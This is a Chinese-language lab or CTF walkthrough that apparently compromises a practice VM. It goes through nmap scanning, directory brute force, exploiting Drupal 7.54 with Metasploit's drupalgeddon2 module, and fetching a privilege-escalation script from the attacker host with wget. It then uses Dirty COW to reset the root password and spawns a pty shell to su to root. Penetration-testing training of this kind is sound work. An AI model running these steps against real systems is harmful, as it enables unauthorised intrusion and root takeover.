信息收集
先查找到靶机IP
执行 nmap -sP 192.168.3.0/24
image.png
确认靶机IP为:192.168.3.135
扫描服务信息
执行:
nmap -sS -sV -T5 -A 192.168.3.135
image.png
我们可以看到开了ssh和http服务,在浏览器打开80端口查看
image.png
就一个页面,查看网页源代码没有啥有用的东西,用目录爆破也扫不出啥文件和目录。在想会不会在其他什么高端口开了什么服务,于是修正nmap为全端口扫描
执行:
nmap -sS -sV -T5 -A 192.168.3.135 -p 1-65535
image.png
我们发现在1898端口也有一个http服务,于是打开页面查看
image.png
发现一个cms登录页面,尝试爆破这个网站的目录
执行:
python3 dirsearch.py -u http://192.168.3.135:1898 -e *
image.png
打开CHANGELOG.txt ,我们发现了cms的名字叫做drupal,版本号是7.54
image.png
攻击
在msf上搜索这个cms的漏洞
image.png
使用unix/webapp/drupal_drupalgeddon2
image.png
攻击成功,获得一个www-data权限的shell
提权
在攻击机起一个http的服务,用于从靶机下载攻击脚本
service apache2 start
把les.sh从攻击机下载到靶机
wget http://192.168.3.134/pe/les.sh
image.png
执行les.sh后,枚举各个提权漏洞
image.png
最后发现40847这个脏牛漏洞可以提权
image.png
编译执行完以后,靶机的root密码会变成dirtyCowFun
需要换成tty模式才能su root账号
执行
python -c 'import pty; pty.spawn("/bin/sh")'然后
su root
image.png
拿到flag
总结
耐心枚举
